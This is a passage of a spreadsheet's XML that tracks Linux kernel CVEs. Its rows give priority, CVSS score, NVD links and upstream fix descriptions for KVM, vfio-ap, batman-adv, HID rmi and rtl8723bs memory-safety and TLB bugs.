kvm_arch_prepare_memory_region() computes new-&gt;arch.flags, i.e. whether
a memslot is KVM_MEM_HUGEPAGE_CAPABLE or KVM_MEM_HUGEPAGE_INCAPABLE,
only for KVM_MR_CREATE and KVM_MR_MOVE, and returns early for every
other change. But the generic code allocates a zeroed memslot for every
change and never copies old-&gt;arch, so after a KVM_MR_FLAGS_ONLY update,
e.g. toggling KVM_MEM_LOG_DIRTY_PAGES for live migration, the active
memslot has arch.flags == 0.
With both flags clear, fault_supports_huge_mapping() falls through to
the alignment check on the HVA range alone, which no longer verifies
that the GPA and HVA have the same offset within a PMD. A memslot that
was marked KVM_MEM_HUGEPAGE_INCAPABLE because of a GPA/HVA offset
mismatch can then be mapped with PMD entries on read faults, and since
kvm_map_page() aligns the gfn and the pfn independently, the guest ends
up accessing the wrong host pages, exactly the "d -&gt; f, e -&gt; g" case
described in the comment above the check.
Carry the arch flags over from the old memslot for KVM_MR_FLAGS_ONLY,
as the GPA, HVA and size are guaranteed to be unchanged for that case.</t>
        </is>
      </c>
      <c r="S221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89908</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89913</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="inlineStr"/>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr"/>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr"/>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: vgic-v3: take an LPI reference in vgic_v3_save_pending_tables
vgic_v3_save_pending_tables() iterates dist-&gt;lpi_xa using xa_for_each()
and dereferences the returned struct vgic_irq in the loop body without
holding a reference on the LPI.
The xarray iterator only provides temporary RCU coverage while looking up
the current entry. That is not sufficient for this loop body, which reads
fields from struct vgic_irq and performs guest memory accesses before the
iteration completes.
A concurrent path can trigger this race: the irqfd cached injection path
(vgic_its_inject_cached_translation) obtains a transient LPI reference
via vgic_its_check_cache() without holding kvm-&gt;lock, vcpu-&gt;mutex,
config_lock, or its_lock. If guest ITS DISCARD then drops the cache and
ITE references under its_lock, the transient inject reference may become
the final one. When vgic_put_irq() drops it, the LPI is erased from
lpi_xa and freed via kfree_rcu(). Meanwhile, vgic_v3_save_pending_tables()
may still hold a stale pointer obtained from the xarray iterator and
dereference it after the RCU grace period completes.
Fix this by re-fetching each iterated LPI via vgic_get_irq(), which takes
a stable reference, and dropping it with vgic_put_irq() on all paths.
This matches the pattern already used by other lpi_xa iterators in the
vgic ITS code.</t>
        </is>
      </c>
      <c r="S222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89913</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89928</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="inlineStr"/>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr"/>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: x86/mmu: Consume the locked rmap value in the lockless rmap walk
__kvm_rmap_lock() deliberately elides the rmap lock when it observes an
empty rmap.  In that case kvm_rmap_lock_readonly() also re-enables
preemption and returns zero, so the caller holds neither the rmap lock
nor a preemption reference.  The elision documents the invariant it
relies on:
	 * Elide the lock if the rmap is empty, as lockless walkers (read-only
	 * mode) don't need to (and can't) walk an empty rmap, nor can they add
	 * entries to the rmap.  I.e. the only paths that process empty rmaps
	 * do so while holding mmu_lock for write, and are mutually exclusive.
kvm_rmap_age_gfn_range() ignores the returned value and unconditionally
enters for_each_rmap_spte_lockless().  The iterator started with
rmap_get_first(), which re-reads rmap_head-&gt;val rather than using the
value returned by the lock.  If a writer populates the rmap between the
lock's read and the iterator's re-read, the aging path walks the newly
installed rmap without holding its lock.
For a KVM_RMAP_MANY rmap this leaves the walker following a
pte_list_desc chain that it never locked.  A writer holding mmu_lock for
write may free that chain (e.g. kvm_zap_all_rmap_sptes() on the recycle
path, or any rmap zap) via kmem_cache_free() while the walk is in
progress, giving a slab use-after-free.  Nothing serialises the two: the
aging path runs without mmu_lock when CONFIG_KVM_MMU_LOCKLESS_AGING=y,
and the rmap lock that would otherwise exclude the writer was elided.
Because the empty path re-enables preemption, the interval between the
two reads can span an arbitrary scheduling delay.
Fix the class of bug by having the lockless walk consume the value
returned by the lock instead of re-reading the rmap.  Split
rmap_get_first() into __rmap_get_first(), which starts an iterator from
an already-read rmap value, and make for_each_rmap_spte_lockless() take
that value and call __rmap_get_first() directly.
kvm_rmap_age_gfn_range() passes the value returned by
kvm_rmap_lock_readonly(): when the lock was elided the value is zero,
__rmap_get_first() returns NULL, and the walk is skipped.  No lockless
walker re-reads the rmap, so the lock-elision invariant cannot be
violated, and no lock()-without-paired-unlock() path is added to the
aging code.</t>
        </is>
      </c>
      <c r="S223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89928</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89929</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="inlineStr"/>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr"/>
      <c r="K224" s="5" t="inlineStr"/>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr"/>
      <c r="Q224" s="5" t="inlineStr"/>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: nVM: Ensure INVVPID is emulated on the correct physical CPU
When emulating INVVPID, KVM executes INVVPID on the physical CPU using
vpid02 (instead of the L1 assigned VPID), after doing some validations
on the operands. However, it is possible that the physical CPU KVM
executes INVVPID on is different from the CPU L2 is running on.
For example, in the following scenario:
- L2 runs on CPU #1 and exits to L1 (vmx-&gt;nested.vmcs02.cpu=1)
- L1 migrates to CPU #2 and executes INVVPID
- KVM executes INVVPID on CPU #2
- L1 migrates back to CPU #1 and runs L2 (vmx-&gt;nested.vmcs02.cpu=1)
The TLB entries on CPU #1 are never invalidated, because INVVPID was
executed on CPU #2, and vmcs02 never ran on a different pCPU (i.e.
vmx_vcpu_load_vmcs() will *not* request KVM_REQ_TLB_FLUSH).
Ensure that INVVPID is being executed on the same pCPU that L2 last ran
on, and if not, fallback to clearing last_vpid=0 to trigger a full VPID
flush on the next nested VM-Enter (as KVM will detect L1 using a
different VPID for L2). If L2 ends up running on a different pCPU, KVM
will flush the TLB anyway through vmx_vcpu_load_vmcs().</t>
        </is>
      </c>
      <c r="S224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89929</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89932</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="inlineStr"/>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr"/>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr"/>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: nVMX: Always flush vpid02 on first use
Make sure vpid02 is always flushed on first use by setting last_vpid=0
when allocating vpid02.  nested_vmx_transition_tlb_flush() will always
detect a VPID change on first VM-Enter after VMXON, because VPID=0 in
vmcs12 is not allowed if L1 enables VPID.
This avoids using stale TLB entries from a previous lifetime of the
VPID, that might have been associated with a different vCPU (or a
completely different VM).
Note that last_vpid is already being initialized as 0 when the vCPU is
created, but it is not reset when vpid02 is freed on VMXOFF. Hence, the
problem can only occur if L1 does VMXOFF -&gt; VMXON, runs an L2, and KVM
happens to reuse a VPID that has TLB entries on the physical CPU.</t>
        </is>
      </c>
      <c r="S225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89932</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89951</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="inlineStr"/>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr"/>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr"/>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
batman-adv: fix stale receive device on merged fragments
Fragment reassembly reuses the skb from the highest-numbered buffered
fragment as the merged packet. When that fragment was received on a hard
interface which is deleted before the chain completes, the merged skb can
re-enter the receive path with a stale skb-&gt;dev and skb_iif.
batadv_batman_skb_recv() passes such merged packets through the normal
receive handlers again. DAT and bridge loop avoidance both derive the ARP
header length from skb-&gt;dev, so they can dereference the freed net_device
before the packet reaches the local mesh interface.
Refresh the receive device metadata from the current receive device before
running the packet handlers. This keeps internally reinjected merged
fragments consistent with the normal receive path after hard interface
teardown.</t>
        </is>
      </c>
      <c r="S226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89951</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89957</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="inlineStr"/>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr"/>
      <c r="K227" s="5" t="inlineStr"/>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr"/>
      <c r="Q227" s="5" t="inlineStr"/>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/vfio-ap: Fix hot-unplug skipped when last AP adapter or domain removed
The vfio_ap_mdev_hot_unplug_cfg() function uses the return value of
bitmap_andnot() to determine whether the guest APCB needs to be updated.
However, bitmap_andnot() returns false when the resulting destination
bitmap is empty. This means that if the only adapter, domain or control
domain assigned to an mdev is removed from the host's AP configuration,
the bit is correctly cleared from the shadow APCB, but bitmap_andnot()
returns false because the result is an empty bitmap. Consequently,
do_hotplug remains 0 and vfio_ap_mdev_update_guest_apcb() is never called,
leaving the KVM guest with stale hardware access to the unplugged AP
devices.
Fix this by replacing the bitmap_andnot() return value check with
bitmap_intersects() to determine whether the shadow APCB actually
overlaps with the removal mask. If there is an intersection, call
bitmap_andnot() solely for its side effect of clearing the bits, then
unconditionally set do_hotplug to trigger the guest APCB update.</t>
        </is>
      </c>
      <c r="S227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89957</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89959</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="inlineStr"/>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr"/>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr"/>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/vfio-ap: Fix control domain removal in vfio_ap_mdev_cfg_remove
The vfio_ap_config_remove function uses the bitmap_andnot function to clear
bits from the matrix_mdev-&gt;matrix.adm bitmap (specifies the control domains
assigned to the mdev). This prevents the explicitly unplugged control
domains from being removed the KVM guest. The bitmap_and function is used
instead.</t>
        </is>
      </c>
      <c r="S228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89959</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89960</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="inlineStr"/>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr"/>
      <c r="K229" s="5" t="inlineStr"/>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr"/>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/vfio-ap: fix stale pqap_hook pointer on error in vfio_ap_mdev_set_kvm()
In vfio_ap_mdev_set_kvm(), kvm-&gt;arch.crypto.pqap_hook is set to
&amp;matrix_mdev-&gt;pqap_hook before the update locks are acquired and the
mdev list is checked for a conflicting assignment. If another mdev is
already attached to the same KVM instance, the function returns -EPERM
without restoring the hook pointer, leaving kvm-&gt;arch.crypto.pqap_hook
pointing at the failing matrix_mdev instead of the mdev that legitimately
owns the KVM.
Since matrix_mdev-&gt;kvm is never set on this error path,
vfio_ap_mdev_unset_kvm() will not clean up the hook when matrix_mdev
is later closed. If matrix_mdev is subsequently freed, any PQAP
instruction executed by the guest will dereference the stale pointer
through pqap_hook_rwsem, resulting in a use-after-free.
Since kvm-&gt;arch.crypto.pqap_hook is only set in the vfio_ap_mdev_set_kvm()
function and is cleared in the vfio_ap_mdev_unset_kvm() function, a check
for 'kvm-&gt;arch.crypto.pqap_hook != NULL' is all that is needed to determine
whether it belongs to another mdev. This will alleviate the need to iterate
the matrix_dev-&gt;mdev_list list to see if the kvm object is assigned to
another mdev.This was introduced in v3 to alleviate the need to take the
mdevs_lock while iterating the list; however, this did not prevent a
potential race condition.
The pqap_hook_rwsem(write) is now performed inside
get_update_locks_for_kvm(), which is updated to acquire
pqap_hook_rwsem(write) between kvm-&gt;lock and mdevs_lock. This ordering
is consistent with the PQAP intercept path, which acquires pqap_hook_rwsem
in read mode while srcu is held under vcpu-&gt;mutex, establishing the
dependency: kvm-&gt;lock -&gt; vcpu-&gt;mutex -&gt; srcu -&gt; pqap_hook_rwsem(read).
The pqap_hook_rwsem is now released inside the
release_update_locks_for_kvm(), which is updated to release
pqap_hook_rwsem(write) between mdevs_lock and kvm-&gt;lock.
Additionally, kvm_put_kvm() in vfio_ap_mdev_unset_kvm() is moved
after release_update_locks_for_kvm(). Previously it was called while
kvm-&gt;lock was held; if it were ever the last reference, kvm_destroy_vm()
would run under kvm-&gt;lock, which would deadlock.</t>
        </is>
      </c>
      <c r="S229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89960</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89995</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="inlineStr"/>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr"/>
      <c r="K230" s="5" t="inlineStr"/>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr"/>
      <c r="Q230" s="5" t="inlineStr"/>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dma-direct: return struct page from dma_direct_alloc_from_pool()
Commit 5b138c534fda ("dma-direct: factor out a dma_direct_alloc_from_pool
helper") changed dma_direct_alloc_from_pool() to return the CPU address
from dma_alloc_from_pool(). That fits dma_direct_alloc(), but
dma_direct_alloc_pages() also uses the helper and expects a struct page *.
Fix this by making dma_direct_alloc_from_pool() return the struct page *
again, and pass the CPU address back through an out-parameter for the
dma_direct_alloc() caller.</t>
        </is>
      </c>
      <c r="S230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89995</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90000</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="inlineStr"/>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr"/>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr"/>
      <c r="Q231" s="5" t="inlineStr"/>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: rmi: fix OOB access with undersized RMI reports
The hid-rmi driver sizes its writeReport/readReport buffer purely from
the report descriptor supplied by the device, with no minimum bound:
	data-&gt;input_report_size  = hid_report_len(input_report);
	data-&gt;output_report_size = hid_report_len(output_report);
	alloc_size = data-&gt;output_report_size + data-&gt;input_report_size;
	data-&gt;writeReport = devm_kzalloc(&amp;hdev-&gt;dev, alloc_size, GFP_KERNEL);
	data-&gt;readReport = data-&gt;writeReport + data-&gt;output_report_size;
but then reads and writes fixed offsets into it.  A device declaring a
1-byte output and a 1-byte input report makes hid_report_len() return 2
for each, so alloc_size is 4, while rmi_set_page() -- reached
unconditionally at probe time through rmi_input_configured() -- stores
writeReport[4] and rmi_hid_read_block() stores writeReport[0..5].  Since
readReport lives at writeReport + output_report_size, those stores also
corrupt the window the next reply is parsed out of.
The read path is worse: the copy length comes from readReport[1], which
the device fills in and can be up to 255, and the copy starts at
&amp;readReport[2] with no regard for input_report_size, so it runs past the
end of the allocation into adjacent slab objects.  This does not even
need a lying device -- rmi_f01_probe() issues a fixed 21-byte register
read, so any device declaring an input report smaller than 23 bytes
reads out of bounds even when it answers truthfully.  Those bytes become
the register values the RMI core acts on: rmi_f01_probe() prints them to
the kernel log as the product id and exports them through the mode 0444
sysfs attribute of the same name, and rmi_driver_set_irq_bits() sends
them back to the device as the interrupt mask, so an undersized report
descriptor leaks heap contents both to unprivileged userspace and to the
device itself.
The write path has no bound either: rmi_hid_write_block() copies an
unbounded len to &amp;writeReport[4], and the largest caller a device can
drive at probe time is rmi_driver_set_irq_bits(), whose length is
derived from the interrupt source counts the device declares in its Page
Description Table.
Finally, the read loop cannot terminate on a zero-length reply: such a
reply copies nothing and advances neither bytes_read nor bytes_needed,
and because a reply did arrive the one second wait_event_timeout() does
not fire either, so a device answering 0 forever keeps the loop running
inside the probe worker with page_mutex held.  khungtaskd does not
notice, because every reply wakes the task.
Reject reports too small for what the driver builds -- 6 output bytes
for the write reports and 3 input bytes for the read handshake -- at
probe time, clamp the write and the read copy to the report sizes the
device declared, and treat a zero-length reply as an error.  A device
refused this way is started as an ordinary HID device, like one that
does not carry the RMI report ids at all.
RMI_DEVICE must not be left set in device_flags on that path, because
rmi_input_configured() would then run the RMI setup and reach
rmi_set_page(), which writes the writeReport buffer the refusal just
skipped allocating.  The bit can arrive set: rmi_probe() copies
id-&gt;driver_data into device_flags before the report checks, and a bind
through the new_id sysfs attribute can supply driver_data with
RMI_DEVICE (BIT(0)) set.  Strip the bit where driver_data is copied, so
RMI_DEVICE keeps meaning exactly "this probe validated the reports"; the
three jumps to start that predate this patch are covered as well.
The error path also clears RMI_READ_DATA_PENDING on its way out, because
that flag is what the wait at the top of the loop tests: leaving it set
would make every later wait_event_timeout() return immediately on the
stale reply and kill the read path for the rest of the device's life.
Clamping does not regress working hardware: the read loop already
handles
---truncated---</t>
        </is>
      </c>
      <c r="S231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90000</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90018</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="inlineStr"/>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr"/>
      <c r="K232" s="5" t="inlineStr"/>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr"/>
      <c r="Q232" s="5" t="inlineStr"/>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
staging: rtl8723bs: fix OOB read / stack overflow in rtw_get_wps_attr()
rtw_get_wps_attr() walks WPS attributes inside a WPS IE taken from
a wireless management frame. For each candidate attribute it only
checks that the fixed 4-byte attribute header (2-byte ID + 2-byte
length) fits inside the IE:
	if (attr_ptr + 4 &gt; wps_ie + wps_ielen)
		break;
	u16 attr_id = get_unaligned_be16(attr_ptr);
	u16 attr_data_len = get_unaligned_be16(attr_ptr + 2);
	u16 attr_len = attr_data_len + 4;
attr_data_len (and therefore attr_len) is read directly from the
wire and is never checked against the remaining bytes in the IE
before being used as the size of:
	memcpy(buf_attr, attr_ptr, attr_len);
Since attr_len is fully attacker controlled (0 to 65535+4), this is
